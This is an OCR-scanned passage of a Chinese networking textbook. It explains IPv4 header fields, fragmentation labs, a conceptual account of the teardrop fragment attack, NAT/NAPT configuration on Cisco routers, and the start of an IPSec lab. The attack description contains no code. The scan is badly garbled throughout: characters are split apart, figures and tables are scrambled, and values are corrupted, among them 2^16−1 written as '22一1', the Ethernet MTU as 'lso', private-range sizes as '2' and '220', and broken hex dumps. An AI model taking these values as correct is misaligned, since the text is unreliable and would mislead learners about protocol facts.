目的 IP=192. 168.2. 3 协议 =TCP _ 源 IP=192. 168. 2. 10 


图 3-3 结合 具体 数据 报 分 析 IP 首部 格式 


(1) 版 本 (version,VER,4b): 这 个 字段 定义 了 IP 协议 的 版 本 。IP 首部 第 1 个 字 节 
的 高 4 位 定义 了 版 本 号 ,目前 的 版 本 是 4(IPv4) 。 然 而 不 久 的 将 来 版 本 6(IPv6) 可 能 会 完 
全 取代 IPv4 协议 。 在 图 3-3 中 第 1 个 字 节 的 高 4 位 二 进 制 数 为 4, 说 明 这 个 数据 报 使 用 
的 是 IPv4 协议 。 

(2) 首部 长 度 (header length, HLEN ,4b): 首 字 节 的 低 4 位 定义 了 首部 长 度 ,这 个 字 
段 以 4 字 节 为 单位 定义 IP 首部 的 长 度 , 即 将 该 值 乘 4 得 到 的 结果 是 IP 首部 的 长 度 。 上 
例 中 首 字 节 的 低 4 位 为 5, 说 明 IP 首部 长 度 是 20。 
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(3) 差分 服务 (differentiated service,DS,1B): 这 个 字段 定义 了 服务 质量 类 型 。 目 前 
在 实际 应 用 中 ,这 个 字段 并 未 使 用 。 在 上 例 中 DS 为 0。 

(4) 总 长 度 (total length,2B) : 该 字段 以 字 节 为 单位 定义 了 IP 数据 报 的 总 长 度 ( 首 
部 和 数据 的 长 度 之 和 )。 因 为 这 个 字段 长 度 为 2 字 节 ,所 以 IP 数据 报 的 总 长 度 限制 在 
65 535(22 一 1) 字 节 范围 之 内 。 在 上 例 中 IP 首部 长 度 为 20 字 节 .数据 长 度 为 28 字 节 , 因 
此 总 长 度 为 48 ,用 十 六 进 制 表示 就 是 0x 00 30。 

(5) 标识 .标志 和 分 片 偏 移 在 3. 2. 2 节 介 绍 。 

(6) 生存 时 间 (TTL.1B): 这 个 字段 用 来 防止 无 人 接收 的 IP 数据 报 在 网 络 中 循环 传 
递 , 造 成 网 络 拥塞 。 当 一 个 信 源 主机 准备 发 送 一 个 IP 数据 报时 , 它 就 在 这 个 数据 报 的 
TTL 字段 存储 一 个 数值 ,这 个 数值 远大 于 信 源 和 信和 宿主 机 之 间 路 由 器 的 个 数 ( 例 如 
Windows 系统 主机 通常 将 TTL 设置 为 128)。 报 文 在 传递 过 程 中 每 经 过 一 台 路 由 器 ， 
TTL 值 就 被 减 1, 如 果 减 1 后 值 为 0, 路 由 器 就 丢弃 这 个 报 文 , 若 不 为 0 路 由 器 就 转发 这 
个 报 文 。 上 例 中 TTL 王 128。 

(7) 协议 (1B): 这 个 字段 定义 了 传输 层 协议 类 型 。 常 见 传 输 层 协议 的 对 应 数值 如 
图 3-4 所 示 。 上 例 中 协议 字段 值 为 6, 代表 传输 层 使 用 的 


值 协议 

是 TCP。 1 ICMP 

(8) 校 验 和 (2B): IP 校 验 和 只 对 首部 进行 校 验 ,而 不 对 数 2 ee 

据 部 分 校 验 。 这 样 做 有 两 个 原因 。 第 一 ,传输 层 协 议 (TCP 和 17 UDP 
UDP) 都 有 自己 的 校 验 和 机 制 , 可 以 保证 高 层 数据 的 完整 性 , 因 | | 


此 IP 校 验 和 不 需要 对 高 层 数据 进行 重复 校 验 。 第 二 ,IP 数据 报 图 3-4 传输 层 协议 数值 
在 整个 传递 过 程 中 会 经 过 多 台 路 由 器 ,每 经 过 一 台 路 由 器 ,IP 首 
部 的 某 些 字段 就 会 发 生 改 变 ( 例 如 TTL、 分 片 偏 移 、 标 志 、 总 长 度 ) ,而 IP 数据 部 分 不 会 改 
变 , 因 此 校 验 和 只 包括 会 发 生变 化 的 IP 首部 ,如 果 将 数据 也 包括 在 内 ,那么 每 台 路 由 器 必 
须 重 新 计算 整个 报 文 的 校 验 和 ,这 就 增加 了 每 台 路 由 器 的 处 理 时 间 ,降低 了 处 理 效率 。 

上 例 中 IP 校 验 和 的 计算 过 程 如 图 3-5 所 示 。20 字 节 的 IP 首部 按照 16 位 等 分 成 10 
段 ,检验 和 字段 设置 为 0, 将 所 有 项 相 加 取 反 得 到 校 验 和 0x3al8 ,将 结果 插入 校 验 和 字段 。 

(9) 源 IP 地 址 (4B): 定义 了 信 源 IP 地 址 ,上 例 信 源 IP 地 址 为 192. 168. 2. 10。 

(10) 目的 IP 地址 (4B): 定义 目的 主机 地 址 ,上 例 为 192. 168. 2. 3。 


322 Pp 数 据 报 的 分 片 和 重组 


受 物理 特性 限制 ,每 种 类 型 网 络 能 传输 的 单个 IP 数据 报 的 最 大 长 度 都 有 一 定 限制 。 
这 个 最 大 数据 报 长 度 称 为 该 类 型 网 络 的 MTU 值 (maximum transfer unit) 。 图 3-6 给 出 
的 是 不 同类 型 网 络 的 MTU 值 。 

由 于 不 同类 型 网 络 能 够 传输 的 最 大 报 文 长 度 不 同 ,这 就 产生 了 IP 数据 报 的 分 片 和 重 
组 问题 ,下 面 举 例 说 明 。 在 图 3-7 中 一 个 以 太 网 络 和 一 个 令 牌 环 网 络 通 过 一 台 路 由 器 连 
接 , 主 机 H 给 主机 A 发 送 一 个 大 小 为 4000 字 节 的 IP 数据 报 ,路 由 器 在 令 牌 环 网 接口 收 
到 这 个 报 文 之 后 ,发现 它 的 长 度 超 过 以 太 网 的 MTU 值 1500, 因 此 将 其 分 为 三 个 分 片 ,大 
小 依次 为 1400、1400 和 1200 字 节 。 这 三 个 分 片 通过 以 太 网 络 最 终 传输 到 主机 A, 主 机 A 
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再 将 这 三 


4 | 5 0 | 48 
15186 | olo | 0 
128 6 | 0 I 
191.168.2.10 
192.168.2.3 
45 和 0 一 一 一 01000101 00000000 
48 一 一 一 00000000 00110000 
15186 一 一 一 00111011 01010010 
010 和 0 一 一 一 01000000 00000000 
128 和 6 一 一 一 10000000 00000110 
0 一 一 一 00000000 00000000 
192.168 一 一 11000000 10101000 
2.10 一 一 一 00000010 00001010 
192.168— 11000000 10101000 
2.3 一 一 一 00000010 00000011 
和 一 -一 一 11000101 11100101 
进位 一 一 一 11000101 11100111 
校 验 和 一 一 00111010 00011000 一 
3A 18 


图 3-5 校 验 和 计算 示例 


的 主机 A 负责 重组 分 片 。 


协议 


MTU 


超级 通道 (Hyperchannel) 65 535 


| 今 牌 环 (16Mb/s) | 17914 | 
| 令 牌 环 4Mb/s) 。 | 4464 | 
| FDDI | 4352 | 
| 以 太 网 | lso | 
| X.25 | 576 | 
| PPP | 296 | 


图 3-6 不 同类 型 网 络 的 MTU 值 


:个 分 片 重组 为 一 个 4000 字 节 的 IP 数据 报 。 在 传输 过 程 中 路 由 器 负责 分 片 , 目 


图 3-7 分 片 和 重组 机 制 


在 IP 首 部 中 与 分 片 和 重组 机 制 有 关 的 字段 是 标识 、 标 志和 分 片 偏 移 。 

(1) 标识 (2B) : 这 个 字段 唯一 地 定义 了 一 个 数据 报 。 数 据 报 被 分 片 时 ,这 个 字段 被 
复制 到 所 有 分 片 中 。 接 收 端 将 具有 相同 标识 的 分 片 重组 成 一 个 原始 报 文 。 

(2) 标志 (3b) : 这 是 一 个 3 位 字段 。 第 一 位 保留 。 第 二 位 是 “不 分 片 位 ”, 如 果 该 位 
值 为 1, 则 路 由 器 不 能 对 该 数据 报 进行 分 片 。 在 上 例 中 如 果 主 机 HH 发 出 的 4000 字 节 的 
IP 数据 报 的 不 分 片 位 设置 为 1, 路 由 器 会 直接 丢弃 这 个 报 文 ,并 向 主机 HH 发 送 一 个 ICMP 
差错 报 文 。 如 果 不 分 片 位 值 为 0, 则 路 由 器 可 以 根据 需要 对 IP 数据 报 进行 分 片 。 第 三 位 
是 “还 有 分 片 位 ”, 如 果 其 值 为 1, 则 表示 当前 报 文 不 是 最 后 一 个 分 片 , 在 该 数据 报 之 后 还 
有 其 他 分 片 ;如 果 其 值 为 0, 则 意味 着 这 个 数据 报 是 最 后 一 个 或 唯一 的 分 片 。 
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(3) 分 片 偏 移 (13b) : 表示 这 个 分 片 的 第 一 个 字 节 在 整个 数据 报 中 的 相对 位 置 。 以 8 
字 节 为 度量 单位 。 

下 面 举例 说 明 IP 数据 报 的 分 片 和 重组 机 制 。 原 始 数据 报 携带 了 4000 字 节 的 数据 ， 
路 由 器 为 了 进行 传输 ,将 原始 数据 报 划 分 为 三 个 分 片 ,原始 数据 报 的 标识 字段 被 复制 到 所 
有 分 片 当 中 ,如 图 3-8 所 示 。 

接收 端 发 现 这 三 个 报 文 具有 相同 的 标识 14 567, 于 是 知道 它们 属于 同一 个 原始 数据 
报 。 接 下 来 确定 三 个 分 片 的 次 序 ,分 片 偏 移 字 段 为 0 的 是 起 始 分 片 。 第 一 个 分 片 的 长 度 
为 1400 字 节 ,因此 第 二 个 分 片 的 偏 移 字 段 为 1400/8=175 ,如果 还 有 其 他 分 片 , 可 依次 确 
定 次 序 。 最 后 一 个 分 片 的 “还 有 分 片 位 ” 值 为 0, 据 此 确定 最 后 一 个 分 片 。 


1420 


14 567 | [1| oo 


0000~1399 字 节 


分 片 1 
4020 | 1420 
14 567 | [of oo00 14567 | | | 


re 


0000~3999 字 节 1400~2799 字 节 
原始 数据 报 分 片 2 


1220 
14 567 | [of 350 


2800~3999 字 节 


分 片 3 
图 3-8 分 片 举例 


训练 : 捕获 分析 IP 数据 报 分 片 。 

第 一 步 : 启动 Windows XP 虚拟 机 ,配置 IP 地 址 为 192. 168. 2. 3 , 子 网 掩 码 为 255. 
255. 255.0。 本 机 IP 地 址 为 192. 168. 2. 10。 

第 二 步 : 在 本 机 执行 ping 192. 168. 2. 3 -1 4000 命令 。-1 参 数 指明 本 机 发 送 的 IP 数 
据 报 大 小 为 4000 字 节 ,这 个 数值 超过 以 太 网 的 最 大 报 文 长 度 限制 1500, 因 此 在 本 机 将 对 
原始 数据 报 进行 分 片 , 以 下 是 使 用 Sniffer 捕获 到 的 三 个 分 片 。 

如 图 3-9 所 示 ,第 一 个 分 片 标识 为 15 186 ,总 长 度 是 1500。IP 数据 报 首部 长 度 是 20 
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字 节 ,因此 IP 数据 部 分 长 度 是 1480 字 节 ,由 此 可 知 第 二 个 IP 数据 报 的 分 片 偏 移 字 段 值 
为 1480/8 王 185, 即 0xB9。 


otal LEN=1500 Flag-001 offset=0 VER=4 HLEN=20 


ID=15 186 | 
c0|c0 co0jc0 co0lc0 00 50 56 c0 00 01 08 00 |45 00| 


05jdc ldl60 20100 80 01 72 63 c0 a8 02 0a c0 a8| 
02 00|02 00 61 62|63 64 65 66| 


目的 IP=192. 168. 2.3 协议 =ICOMP _ 源 IP=192. 168. 2. 10 
图 3-9 第 一 个 分 片 


如 图 3-10 所 示 ,第 二 个 分 片 的 标识 也 是 15 186 ,分 片 偏 移 为 0xB9。 总 长 度 为 1500 字 
节 。IP 首部 长 度 为 20 字 节 ,因此 IP 数据 部 分 长 度 为 1480 字 节 ,由 此 可 知 第 三 个 IP 数据 
报 的 分 片 偏 移 字 段 值 为 (1480 十 1480)/8 王 370, 即 0x172 。 


otal LEN=1500 Flag-001 offset=185x8=1480 VER=4 HLEN=2! 


Be 15 186 
由 c0 c0|co c0lc0 00 50 56 c0 00 01 08 00 45 00 
051dc ~ 60 20|b9 80 01 ?1 aa c0 a8 02 0a c0 agl 
i We 


人 168. 2.3 el ICMP ni 192. 168. 2. 10 


图 3-10 第 二 个 分 片 


如 图 3-11 所 示 ,第 三 个 分 片 的 标识 也 是 15 186 ,分 片 偏 移 为 0x172。 总 长 度 为 1068 
字 节 。IP 首部 长 度 为 20 字 节 ,因此 IP 数据 部 分 长 度 为 1048 字 节 。 这 个 数据 报 的 “还 有 
分 片 位 ” 值 为 0, 说 明 这 是 最 后 一 个 分 片 。 


‘otal LEN=1068 Flag-000 offset=370x8=2960 VER=4 HLEN=2' 


ID=15186 
c0jc0 co0jc0 co0lc0 00 50 56 c0 00 01 08 00|45 0 
04l2c ldl60 01172 80 01 92 al c0 a8 02 0a c0 a 
02 03 4 75 7 


a c 6d bel6f 70 71 72|73 7 


的 IP=192. 168. 2.3 协议 =IOMP 源 IP=192. 168. 2. 10 
图 3-11 第 三 个 分 片 


三 个 分 片 IP 数据 部 分 的 长 度 分别 为 1480、1480 和 1048 字 节 ,将 这 三 个 数值 相 加 得 
到 的 结果 为 4008 ,而 不 是 4000 ,那么 多 出 的 那 8 字 节 是 什么 呢 ? 通过 Sniffer 分 析 第 一 
分 片 可 知 , 多 出 的 那 8 字 节 数据 是 ICMP 的 首部 。 


_ 芯 泪 滴 攻 击 


图 3-12 给 出 的 是 正常 情况 下 IP 数据 报 的 分 片 和 重组 过 程 。 在 发 送 端 3072 字 节 的 
原始 数据 报 被 分 成 三 个 1024 字 节 的 分 片 通过 网 络 传输 给 接收 端 ,接收 端 收 到 这 三 个 分 片 
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之 后 ,根据 三 个 分 片 的 标识 、 标 志和 分 片 偏 移 字 段 将 这 三 个 分 片 重新 组 装 成 一 个 原始 
报 文 。 


1-3072 字 节 | 发送 站 


2049~3072 字 节 


1025~2048 字 节 网 络 


1~1024 字 节 


1~3072 字 节 接收 端 
图 3-12 正常 情况 下 的 分 片 过 程 


泪 滴 攻击 也 称 为 分 片 攻 击 。 它 是 入 侵 者 伪造 数据 报 文 ,向 目标 主机 发 送 含 有 重 释 偏 
移 的 畸形 数据 分 片 , 当 数 据 分 片 到 达 目 的 主机 后 ,在 堆栈 中 重组 时 ,就 会 导致 重组 出 错 , 引 
起 协议 栈 的 骨 演 。 图 3-13 给 出 的 是 泪 滴 攻击 的 示意 图 。 


入 侵 者 


2049~3072 字 节 


1000-2048 字 节 


1~1024 字 节 


重 装 出 错 目标 主机 
图 3-13 泪 滴 攻击 示意 图 


攻击 者 发 送 三 个 分 片 ,目标 主机 收 到 这 三 个 分 片 之 后 ,发 现 它们 具有 相同 的 标识 字 
段 ,因此 尝试 将 它们 重组 成 一 个 原始 报 文 , 但 由 于 第 一 和 第 二 个 数据 分 片 具有 重 秋 部 分 ， 
因此 重组 失败 。 如 果 这 类 重重 报 文 数量 庞大 ,就 会 引起 目标 主机 协议 栈 骨 溃 。 


3.4 ”网 络 地 址 转换 


34.1 专用 地 址 


所 有 IPv4 地 址 加 在 一 起 总 共有 2* 个 ,这 个 数字 虽然 看 起 来 比较 庞大 ,但 随 着 
Internet 规模 的 快速 增长 ,IP 地 址 出 现 不 足 。 

中 国 的 IPv4 地 址 主要 是 通过 几 大 网 络 运 营 商 和 中 国 互联 网 络 信息 中 心 申请 到 的 。 
在 我 国 拥有 的 IPv4 地 址 中 ,运营 商 手 中 仍 掌握 部 分 IPv4 地 址 可 以 使 用 ,根据 运营 商 网 络 
和 业务 的 不 同情 况 , 有 的 运营 商 手 中 的 地 址 可 以 支撑 未 来 五 六 年 ,有 的 则 只 能 支撑 一 
两 年 。 

如 何 解 决 IP 地 址 不 足 的 问题 呢 ? 因特网 权威 机 构 采 用 专用 地 址 来 解决 。IP 地 址 空 
间 中 预 留 出 三 块 地 址 用 做 专用 地 址 , 见 图 3-14。 任 何 组 织 机 构 都 可 以 使 用 这 些 专用 地 
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址 ,而 不 需要 获得 因特网 权威 机 构 的 许可 ,这 就 解决 了 地 址 不 足 的 问题 。 


前 级 范围 | 总 数 

10/8 10.0.0.0~10.255.255.255 | 2 

172.16/12 172.16.0.0~172.31.255.255 | 220 

192.168/16 192.168.0.0~192.168.255.255 | 2 
图 3-14 专用 地 址 


342 网 络 地 址 转换 概述 


专用 地 址 虽然 解决 了 IP 地 址 不 足 的 问题 ,但 由 于 任何 一 个 组 织 机 构 都 可 以 随意 地 使 
用 专用 地 址 块 ,这 会 导致 不 同 机 构 的 主机 采用 了 相同 的 IP 地 址 , 即 出 现 IP 地 址 冲突 。 为 
了 防止 这 种 现象 的 出 现 , 因 特 网 权威 机 构 规定 : 专用 地 址 只 能 使 用 在 机 构 的 内 部 局 域 网 
中 ,而 不 能 出 现在 外 部 的 因特网 上 ( 即 路 由 器 不 会 向 外 网 转发 目的 IP 地 址 为 专用 地 址 的 
数据 报 )。 这 样 一 来 地 址 冲突 的 问题 解决 了 ,但 又 导致 内 部 主机 无 法 与 外 网 通信 的 问题 。 

为 了 能 让 使 用 专用 地 址 的 内 部 主机 与 外 部 因特网 通信 ,在 路 由 器 上 需要 开启 NAT 
地 址 转换 功能 。 图 3-15 说 明了 NAT 地 址 转换 过 程 。 内 部 网 络 使 用 192. 168. * . x 的 专 
用 地 址 块 ,内 部 网 络 通过 NAT 路 由 器 与 外 部 因特网 连接 。IP 地 址 为 192. 168. 7. 1 的 内 
部 主机 向 外 网 主机 发 送 一 个 数据 报 , 报 文 的 源 IP 地 址 为 192. 168. 7. 1。 报 文 到 达 路 由 器 
之 后 ,路 由 器 将 源 IP 地 址 替换 为 自己 的 合法 地 址 200. 24. 5. 8 ,之 后 将 其 转发 给 外 网 ,此 
时 数据 报 的 源 和 目的 IP 地 址 都 是 合法 IP, 因 此 可 以 通过 因特网 传送 到 目的 主机 。 


192.168.7.1 | 

源 地 址 : 192.168.7.1 | 源 地 址 : 200.24.5.8 
1 
1 


| = == 


目的 地 址 : 192.168.7.1 | 目的 地 址 : 200.24.5.8 


图 3-15 NAT 地 址 转换 过 程 


外 网 返回 的 数据 报到 达 路 由 器 之 后 ,路 由 器 将 目的 IP 地 址 由 200. 24. 5. 8 替换 回 
192.168.7.1, 然 后 在 内 网 接口 转发 ,这 样 一 来 内 部 主机 实现 了 与 外 部 主机 的 通信 。 


343 同时 使 用 PP 地 址 和 端口 号 
目前 路 由 器 广泛 采用 的 NAT 转换 方法 是 同时 使 用 IP 地 址 和 端口 号 的 NAPT 转换 
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方法 ,下 面 结 合 实例 说 明 。 在 NAT 路 由 器 上 维护 了 一 个 端口 池 , 其 中 保存 了 1025 一 
65 535 共 64 511 个 随机 端口 ,同时 路 由 器 维护 了 一 个 转换 表 , 包 括 4 个 字段 : 专用 地 址 、 
源 端口 .专用 端口 和 传输 层 协 议 字 段 。 如 图 3-16 所 示 ,假设 路 由 器 接收 到 一 个 发 给 外 网 
的 数据 报 , 源 IP 地 址 为 192. 168. 7. 1 、 源 端口 为 2000, 目 的 IP 为 25. 8. 2. 10、 目 的 端口 为 
80。 路 由 器 从 端口 池 中 取出 一 个 空闲 端口 1025 分 配给 这 条 TCP 连接 ,然后 在 转换 表 中 
记录 下 相应 信息 ,之 后 将 源 IP 地 址 改 为 自己 的 合法 IP 地 址 200. 24. 5. 8、 源 端口 改 为 
1025 ,再 将 报 文 转发 给 因特网 。 

因特网 返回 的 数据 报到 达 路 由 器 之 后 ,路 由 器 取出 报 文 的 目的 端口 1025 到 转换 表 中 
进行 查找 ,发 现存 在 匹配 记录 ,于 是 将 报 文 的 目的 IP 改 为 192. 168.7.1、 目 的 端口 改 为 
2000 ,之 后 将 报 文 在 内 网 接口 转发 ,这 样 内 、 外 网 主机 实现 了 连通 。 当 这 条 TCP 连接 不 再 
使 用 时 (例如 出 现 4 次 挥手 中 断 连接 报 文 或 RST 复位 报 文 或 连接 超时 ) ,这 条 转换 记录 将 
被 清除 ,1025 端口 被 重新 放 回 端口 池 。 

25.8.2.10 


端口 池 (1025~65 535) 


3 Internet 
192.168.7.4 | 200.24.5.8 


192.168.7.1: 2000 一 -一 一 25.8.2.10: 80 
200.24.5.8: 1025 一 -一 一 25.8.2.10: 80 
200.24.5.8: 1025 一 一 一 25.8.2.10: 80 
192.168.7.1: 2000 一 一 一 25.8.2.10: 80 


192.168.7.1 2000 1025 TCP 


转换 表 
图 3-16 NAPT 转换 


训练 : 利用 NAPT 实现 局 域 网 访问 因特网 。 
第 一 步 : 利用 Cisco 模拟 器 按照 图 3-17 组 建 网 络 。 


routerl router2 
192.168.10.140 = 1 61.1.1.140 
0 1 202.1.1.2 0 
F4 F4 

Fl Switchl i Switch2 

Fr2 F2 、 
PC1 PC2 PC3 PC4 PC5 PC6 

192.168.10.* 模 拟 局 域 网 61.1.1.* 模 拟 因 特 网 


图 3-17 网 络 拓扑 结构 
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1~3 号 主机 连接 在 Switchl 的 1 一 3 端口 上 ,Switchl 的 4 端口 与 routerl 的 0/0 端 
口 连接 。4 一 6 号 主机 连接 在 Switch2 的 1 一 3 端口 ,Switch2 的 4 端口 与 router2 的 0/0 
端口 连接 。routerl 的 0/1 端口 和 router2 的 0/1 端口 通过 一 根 反 序 双 绞 线 连接 在 一 起 。 
Switchl 上 连接 的 主机 处 于 192. 168. 10. * 网 段 ( 模 拟 使 用 专用 地 址 的 局 域 网 )。Switch2 
上 连接 的 主机 处 于 61. 1.1. * 网 段 (模拟 使 用 全 球 合法 地 址 的 外 部 Internet) 。 

第 二 步 : 将 1 一 3 号 主机 的 IP 地 址 改 为 192. 168. 10. * ,其 中 x 为 序号 ,网 关 设 置 为 
192. 168. 10. 140。 将 4~6 号 主机 的 IP 地 址 改 为 61. 1. 1. * 。 其 中 * 为 序号 ,网 关 设置 
为 61. 1.1. 140。 

第 三 步 : 配置 局 域 网 路 由 器 routerl 端口 IP 地 址 。 


router > en 

router #conf 七 

router (config)#interface fastethernet 0/0 

router (config- if)#ip address 192.168.10.140 255.255.255.0 
router (config- if)#no shutdown 

router (config- if)#interface fastethernet 0/1 

router (config- if)#ip address 202.1.1.1 255.255.255.0 
router (config- if)#no shutdown 

router (config- if)# 

router # 


router #show ip interface brief 


Interface IP- Address (Pri) OK? Status 
FastEthernet 0/0 192.168.10.140/24 YES UP 
FastEthernet 0/1 202.1.1.1/24 YES UP 


第 四 步 : 配置 互联 网 路 由 器 router2 端口 IP 地 址 。 


Touter> en 

router #conf 七 

router (config)#interface fastethernet 0/0 

router (config- if)#ip address 61.1.1.140 255.255.255.0 
router (config- if)#no shutdown 

router (config- if)#interface fastethernet 0/1 

router (config- if)#ip address 202.1.1.2 255.255.255.0 
router (config- if)#no shutdown 

router (config- if)# 

router #3 


router #show ip interface brief 


Interface IP- Address (Pri) OK? Status 
EastEthernet 0/0 61.1.1.140/24 YES UP 
FastEthernet 0/1 202.1.1.2/24 YES UP 


第 五 步 : 在 局 域 网 路 由 器 routerl 上 配置 默认 路 由 。 


router #conf 七 
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router (config)#ip route 0.0.0.0 0.0.0.0 fastethernet 0/1 
router (config)# 人 ^z 
router #show ip route 
Codes: C -connected, S -static, I -IGRP, R -RIP, M -mobile, B -BGP 
D — EIGRP, EX — EIGRP external, O ~ OSPF, IA -OSPF inter area 
N1 — OSPF NSSA external type 1, N2 ~ OSPF NSSA external type 2 
El - OSPF external type 1, E2 - OSPF external type 2, E - EGP 
i -IS-IS, Ll -IS-IS level-1, L2 -IS-IS level-2, ia -IS-IS inter area 
* —Candidate default, U -per- user static route, o -ODR 
P -periodic downloaded static route 


Gateway of last resort is 0.0.0.0 to network 0.0.0.0 


如 192.168.10.0/24 is directly connected, FastEthernet0/0 
C 202.1.1.0/24 is directly connected, FastEthernet0/1 
Sx 0.0.0.0/0 is directly connected, FastEthernet0/1 


第 六 步 : 在 局 域 网 路 由 器 routerl 上 配置 NAPT 映射 。 


Router#conf t 

Router (config)#interface fastethernet 0/0 

Router (config- if)#ip nat inside // 定 义 0 端口 为 内 网 端口 
Router (config- if)#exit 

Router (config)#interface fastethernet 0/1 

Router (config- if)#ip nat outside // 定 义 1 端口 为 外 网 接口 
Router (config- if)#exit 

Router (config)#ip nat pool to internet 202.1.1.3 202.1.1.10 netmask 255.255.255.0 
Router (config)#access- list 10 permit 192.168.10.0 0.0.0.255 

// 定 义 允 许 转换 的 地 址 


Router (config)#ip nat inside source list 10 pool to internet overload 


第 七 步 : 在 公 网 PC4 上 开启 Web 服务 ,在 1 一 3 号 主机 访问 论坛 ,在 routerl 上 查看 


形成 的 日 志文 件 。 
Router#show ip nat translations 
Pro Inside global Inside local Outside local Outside global 
top 202,.1.1.3:1025 192.168.10.1:1025 61.1.1.4:80 61.1.1.4:80 
tcp 202.1.1.3:1024 192.168.10.2:1025 61.1.1:1:80 LY Woh We 


344 利用 静态 NAT 实 现 因 特 网 主机 访问 局 域 网 服务 器 
通过 NAPT 可 以 实现 内 网 主机 与 外 网 的 通信 ,但 这 种 通信 必须 由 内 网 主机 首先 发 


起 ,这 样 才 会 在 路 由 器 的 转换 表 中 形成 转换 记录 。 然 而 在 很 多 情况 下 需要 在 内 部 网 络 拱 
建 服务 器 供 外 网 用 户 访问 ,例如 ,在 内 网 搭建 介绍 本 单位 信息 的 Web 服务 器 .提供 资源 下 


载 服务 的 FTP 服务 器 等 ,这 种 情况 下 通信 由 外 网 的 客户 机 首先 发 起 ,但 由 于 在 转换 表 中 
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没有 形成 转换 记录 ,外 网 主机 将 无 法 访问 到 内 网 服务 器 。 为 了 解决 这 一 问题 ,目前 广泛 采 
用 的 办 法 是 预先 在 路 由 器 的 转换 表 中 添加 一 条 静态 转换 记录 ,将 某 个 全 局 地 址 映射 为 内 
部 服务 器 使 用 的 专用 地 址 。 这 样 一 来 ,外 网 用 户 就 可 以 通过 这 个 全 局 合法 地 址 访问 到 内 
网 的 服务 器 。 下 面 通过 一 个 实例 来 学 习 这 种 方法 。 

训练 : 利用 静态 NAT 实现 因特网 主机 访问 局 域 网 服务 器 。 

在 PC3 上 开启 Web 服务 ,模拟 在 内 网 组 建 的 Web 服务 器 。 其 IP 地 址 是 192. 168. 
10.3, 在 routerl 上 开启 静态 地 址 转换 ,将 192. 168. 10. 3 映射 为 202. 1. 1. 5, 使 外 部 
Internet 上 的 主机 可 以 通过 202. 1.1.5 访问 到 内 网 服务 器 上 搭建 的 网 站 。 

第 一 步 : 为 内 网 服务 器 配置 IP 地 址 和 网 关 地 址 。 

第 二 步 : 配置 局 域 网 路 由 器 routerl 端口 IP 地 址 (步骤 略 ) 。 

第 三 步 : 配置 互联 网 路 由 器 router2 端口 IP 地 址 (步骤 略 ) 。 

第 四 步 : 在 routerl 上 定义 默认 路 由 (步骤 略 ) 。 

第 五 步 : 在 routerl 上 配置 静态 内 部 源 地址 转换 ,将 PC3 的 IP 地 址 192. 168. 10. 3 映 
射 为 地 址 池 中 的 全 球 合法 IP 地 址 202. 1. 1. 5。 

选中 routerl 


router#conf t 


router (config)#ip nat inside source static 192.168.10.3 202.1.1.5 
解释 : 将 PC3 的 专用 地 址 映射 为 全 球 合法 地 址 


router (config)#interface fastethernet 0/0 


router (config- if)#ip nat inside 
解释 : 定义 内 部 接口 


router (config- if)#interface fastethernet 0/1 


router (config- if)#ip nat outside 

解释 : 定义 外 部 接口 

第 六 步 : 在 4~6 号 主机 的 IE 地址 栏 中 输入 “http://202.1.1.5/” 登 录 内 网 服务 器 。 
第 七 步 : 登录 routerl ,查看 地 址 转换 结果 。 

router#show ip nat translations 


Pro Inside global Inside local Outside local Outside global 
===， E15 192.168.10.3 Es 


3.5 网 络 层 的 安全 协议 IPSec 


IPSec(IP Security) 是 由 IETF(Internet Engineering Task Force, 因 特 网 工程 任务 

组 ) 设 计 的 用 来 为 IP 层 的 分 组 提供 安全 的 一 组 协议 。IPSec 没有 规定 使 用 特定 的 加 密 或 
者 鉴别 方法 ,而 是 提供 一 个 框架 和 机 制 , 它 将 加 密 、 鉴 别 和 散 列 方法 的 选择 权 留 给 用 户 。 
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351 测试 开通 IPSec 通道 .采用 AH 协议 .提供 完整 性 校 验 


1. 测试 环境 

实验 环境 如 图 3-18 所 示 。Windows XP 虚拟 机 作为 Web 服务 器 ,本 机 作为 客户 端 ， 
联网 方式 为 hostronly, 各 个 对 象 的 地 址 信 Web 服 务 器 
息 如 图 3-18 所 示 。 windows ,192.168.1112 


2 测试 目的 xPp 虚 所 机 £3? 00-0C-29-D8-72-73 

在 本 机 和 Windows XP 虚拟 机 上 开通 host-only 联 网 
IPSec 通道 ,选择 AH 协议 。 使 用 Sniffer 
Pro 捕获 客户 访问 Web 服务 器 过 程 中 传输 本 机 192.168.111.1 

SP 00-50-56-C0-00-01 

的 数据 包 , 通 过 分 析 捕获 的 数据 ,进一步 理 六 
解 IPSec 协议 的 组 成 .AH 协议 的 格式 和 图 3-18 实验 环境 
作用 。 

3 实验 步骤 

第 一 步 : 开通 本 机 的 IPSec 通道 。 

在 本 机 控制 面板 中 双击 “管理 工具 -双击 “本 地 安全 策略 ?一 右 击 “IP 安全 策略 ”, 在 
本 地 计算 机 选择 创建 IP 安全 策略 一 单 击 “ 下 一 步 ” 按 钮 一 输入 新 策略 名 称 ( 例 如 AA) 一 
单 击 “ 下 一 步 ” 按 钮 ,直至 完成 。 新 添加 的 AA 策略 如 图 3-19 所 示 。 


外 本 地 安全 设置 

文件 到) 操作) 查看 WW) 帮助 0) 

+ XX 曙 了 区 | 名 | 租 计 | 导 2 

秒 安全 设置 和 名称/ 描 术 


从 
俺 安全 服务 器 (需要 . .， 对 所 有 IP 通讯 总 是 使 用 kerberos 信任 请 求 安 全 。 
| 着 客户 端 ( 仅 响 应 ) 正常 通讯 (不 安全 的 )。 使 用 默认 的 响应 规则 与 请 示 


由 回 软件 限制 第 略 | 罗 新 I 安全 第 略 
遇 二 安全 策略 ,在 本 地 计算 机 | 着 服务 器 ( 清 求 安全 ) 。 对 所 有 IF 通讯 总 是 使 用 Kerberos 信任 请 求 安全 。 


图 3-19 新 添加 的 AA 策略 


右 击 "AA 策略 ?一 选择 “属性 ”一 单 击 * 添 加 ”按钮 一 在 “IP 筛选 器 ?列表 中 单 击 “ 添 
加 ?按钮 一 输入 新 筛选 器 名 称 ( 如 AA 筛选 器 ) 一 单 击 “ 添 加 ?按钮 ~ 源 地 址 和 目标 地 址 按 
如 图 3-20 所 示 进 行 配 置 一 单 击 " 确 定 ? 按 钮 。 
在 “IP 筛选 器 ?列表 中 选中 *AA 筛选 器 ”一 单 击 “筛选 器 操作 ?标签 一 单 击 “ 添 加 ” 按 
钮 一 选中 “协商 安全 ”一 单 击 “添加 ”按钮 ~ 选择 “ 自 定义 ”~ 单 击 “设置 ?选中 “地 址 和 数 
